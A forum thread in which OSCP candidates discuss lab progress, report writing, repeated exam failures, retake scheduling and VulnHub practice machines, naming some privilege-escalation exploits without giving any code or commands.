OSCP (starting 13/12/2015)

Sheiko37

I just managed to get that working but without needing to do any changes to the SSH port, trying to run dirb on it now.

Sheiko37

I finally managed to hack a device in the Admin Network (JIM-DESKTOP), it was all about pivoting and port forwarding, complicated and dry.

I went to an admin when I was stuck on it and he gave me a canned response about drawing my port forwarding with a pencil and paper and going back to the network diagram in the manual... the second time I've been given that answer. It turned out I just had a single character typo. Why would he send me down the rabbit hole of doubting everything I was doing with port forwarding when it was correct? Did he even read my question?

I have four days lab access left and I'm spending it collecting screenshots for my lab report and exercises in the manual. The final list - ALICE, BOB, BOB2, ORACLE, ORACLE2, PEDRO, PHOENIX, KRAKEN, MIKE, REDHAT, FREEBSD, MAILMAN, JEFF, UBUNTU7, SHERLOCK, IT-JOE, SRV2, THINCMAIL, KEVIN-PC, RALPH, COREHTTP, SIPSERVER, OTRS, FC4, FC42, HELPDESK, TIMECLOCKDEV, NIKY, JIM-DESKTOP, and BILL (low privilege).

joneno

Sheiko,
Did you get an extension?

Sheiko37

No extension. I'll do my lab report and have an attempt at the exam. If I fail then I'll re-evaluate and look at getting more lab time.

Sheiko37

I'm getting through the lab report but it's a mess. Their template has you sort everything by vulnerability, not by IP, so when it comes to privilege escalation vulnerabilities I'm writing as though it's just assumed you have low privilege access on the system, otherwise you'll be repeating yourself constantly or referencing exploits from pages back.

e.g. anonymous FTP is a low severity vulnerability, and I've written a report on that affecting a few systems. Then many pages later I might have a linux-sendpage privilege escalation... well do you mention you copied it across via anonymous FTP or is it not relevant since the explanation of this vulnerability assumes you have low privilege access.

Having said that, in the real world it would be much easier to action the solutions in a report when ordered this way.

tceu

Sheiko, did you master the exam?

Sheiko37

I have the exam booked for this coming Tuesday.

I'm getting through the lab report, thought I'd post some details of my method that others my find helpful. https://web.nvd.nist.gov is good to take your severity from, and http://www.securityfocus.com/ is good vulnerability fixes (under the solution tab), and either of these sites, or rapid7.com, cve.mitre.org, and cvedetails.com are all good to take your vulnerability explanation from. I haven't been re-wording these much, I see no benefit from re-writing it in your own words, though some explanations need to be made relevant to the lab device.

Sch1sm

I wasn't really planning on submitting the entire lab report like that, I assumed people just uploaded their notes from KeepNote/whatever. Has anyone else who's submitted their report chime in?

Sheiko37

https://support.offensive-security.com/#!oscp-exam-guide.md

Documentation Requirements: (Optional) Lab Report

You are highly encouraged to submit a penetration test report, including exercises, for the lab environment. A lab report has the potential to provide you with bonus points if you are close to passing the exam.

If further clarification is necessary, you can also provide any KeepNote files that contain your rough notes. Please note that your KeepNote files are not a substitute for the lab or exam report.

Jebjeb

you do not upload your keepnote files! They can actually deduct points for not following their or an report format. I did not do a lab report, but did attach the Proof texts and machine names, ip, and status as a table in an appendix.

Sheiko37

Well I'm done, exam failed, don't know if I have the energy to submit a mostly empty report tomorrow, right now I honestly regret ever signing up for this course.

invictus_123

Sheiko37 wrote: »

Well I'm done, exam failed, don't know if I have the energy to submit a mostly empty report tomorrow, right now I honestly regret ever signing up for this course.

What happened mate?

griffondg

I feel your pain as I failed a week ago too. Time crunch got to me and I never even bothered to submit a report since I knew there was 0% chance I would pass. Looking at it with a clear head after I see some obvious things I missed. Keep at it and give it a try once you figure out what to do different. I'm taking the exam again in a few weeks.

Good luck!
Eric

Sheiko37

The exploit fix took about 3.5 hours, lots of problems but eventually worked.

I got root on 1 other machine. The low privilege shell through a web application that was surprisingly hard to even find existing, then escalated privileges with Mempodipper which only worked after using a command to break out of a "jail" shell, which to be honest was a complete fluke.

I got a low privilege shell with Metasploit on one machine, spent another maybe 8 hours total on that one without being able to escalate. I tried a dozen local root exploits. There was nothing unordinary running as root, no applications or services that brought much attention, I spent hours on them all though, hours on sudoedit privilege escalation that went nowhere.

The other 2, well one of them I found nothing, I could not even find a hint of any low privilege access, traversal, etc. absolutely nothing. The other one worth 10 points I found three separate applications all with multiple exploits but none worked. I went over every exploit in existence for all those applications many times.

Sheiko37

Their exam re-take policy is so stupid. If you wanted to take the exam in say a month from now and book two weeks lab access leading up to it - can't be done. If you buy more lab access it starts now, no option to schedule it in the future. You might say, why not just wait a few weeks and then book the lab time. If you do that all the exam spots will be taken in the schedule, there is no way to look at exam availability until after you've paid them.

ilikeshells

The exam is challenging. It is extremely frustrating at times. I know, I retook 3x. My only advice is think about how you can be more efficient in enumerating and knowing when to move on. Good luck!

Sheiko37

Here's some advice for prospective students, book your exam a few weeks before the end of your lab time. If you fail you can just get back in the labs and buy another exam ticket. If you do your lab report as you go then you'll have it ready in time for the exam.

Sheiko37

It's been a while since an update. I'm finishing up my second exam attempt, came in a fair bit more prepared and it's gone significantly worse.

chrisone

Keep at it Sheiko! Looks like many people try 3-5 times to pass. Do not let frustration stop you from moving forward.

Sch1sm

I just got destroyed in the exam this week too. I got most of the machines in the lab but had no idea what to do with the exam machines. Not really sure where to go from here, I could buy more lab time but I can't really see how that would significantly improve my chances of passing.

griffondg

Count me in the multiple fails category. Just finished the exam for the 2nd time this morning and while I did better than last time I still fell short. I spent about the last 8 hours on one system trying to escalate privileges which would have given me enough. Oh well, two more weeks and I'll be back at it!

towentum

I haven't sat the exam yet, but I have read several reviews and pentesting methodologies. The number one killer I see is the failure to fully enumerate. I understand exploits will fail on occasion, but it's a case of measure twice and cut once. The act of owning the box and escalating privileges should account for less than 10% of the time spent on the box (statistic I made up just now). Multiple people have told me in and out of the industry that you should only fire off your exploit when your certain it will work.

I'm not sure what your methods are, but a friendly tip is to enumerate until you feel like you are best friends with that box. Until you know it's deepest darkest secrets!

Sheiko37

I've been told twice a day for the last four months that enumeration is important - I get it.

I've scheduled my third attempt for 12th of June, that's the earliest I could get, it books out way in advance.

In the meantime I've done seven machines from VulnHub, can't recommend it enough. I reckon I've learned more in a week on VulnHub machines than I have in a month in the OSCP labs. I'm going to keep doing VulnHub machines up until the exam, hopefully get through 30+

Sch1sm

I've been working through some vulnhub ones aswell. It helps immensely to have a walkthrough available imo. If you're stuck on something you can just check it, learn from it, and then execute it. It saves the ridiculous frustration and obscure bullshit you get with the offsec labs. Can you recommend any vulnhub machines?

Sheiko37

This is what I've seen mentioned in OSCP reviews and been recommended by current students.

Damn Vulnerable Web Application
Kevgir
Kioptrix Level 1
Kioptrix Level 1.1
Kioptrix Level 1.2
Kioprtix Level 1.3
Kioptrix 2014
Lord Of The Root 1.0.1
Pegasus
SickOs 1.1
***** 1
***** 2

Kioprix Level 1 is probably too easy, level 3 was not so great. ***** 1 and SickOS 1.1 are both great. Haven't done the rest yet.

There's some others that I haven't seen recommended anywhere but I just quickly skim a walkthrough and see if it looks interesting. Droopy v0.2 was great, SecTalks Minotaur and Simple both look interesting but haven't tried yet. SickOs 1.2 is the newest one and overall isn't that great though I learned some curl one-liners for a php reverse shell via WebDAV.

Edit: Apparently there's a wordfilter on T-r-0-l-l.

griffondg

Thanks for the tips on the vulnhub servers. Will spend the next couple of weeks on those before I retake the exam.

osc

Hi Sheiko, I also regret signing up for the course because the course material is so basic and now I have to keep paying to extend lab time until I get lucky and discover the right techniques I'm paying to learn. I wouldn't mind if they at least gave a complete list of topics to research so it's not blind luck until you stumble on the right thing.

Let's be study buddies, I think we could save a lot of time and learn at lot more by working together. I've owned about 20 lab boxes and have attempted the exam too.

Sheiko37

A small update. I've gone through 16 boxes from vulnhub.com. I've been looking for ones that I think would be relevant to the OSCP but they're getting harder to find. I've learned a lot from the VMs on the site but I'm no more confident for the next exam. In general I think the VulnHub VMs are easier, i.e. if something looks vulnerable it probably is, whereas the OSCP I remember trying a lot of entry points that all ended up being protected/disabled/not working.

I've managed to re-schedule the exam for 4th of June. If you keep checking the exam schedule occasionally a slot will open, if you're lucky.

I've also noticed in their FAQ update they now explicitly state the points you get for submitting a lab report and exercises from the coursework, it's 5 points each - https://support.offensive-security.com/#!pwk-reporting.md. The only guesswork left is how much they score low privilege shells in the exam, they only say less than half the full mark.

!nf0s3cure

Well, good post. I think with your experience I will try to get a SANS 560 or similar and then try. Not sure if anyone can make a recommendation if 560 will help at all?

Sheiko37

If I were to start over I would buy 30 days access to do all the course material and document everything (for the 5 points), then step back and spend a few months on VulnHub and other VM penetration testing sites, whilst reading a good book on penetration testing, then come back and buy 60 days lab access for the OSCP. The experience would be vastly different.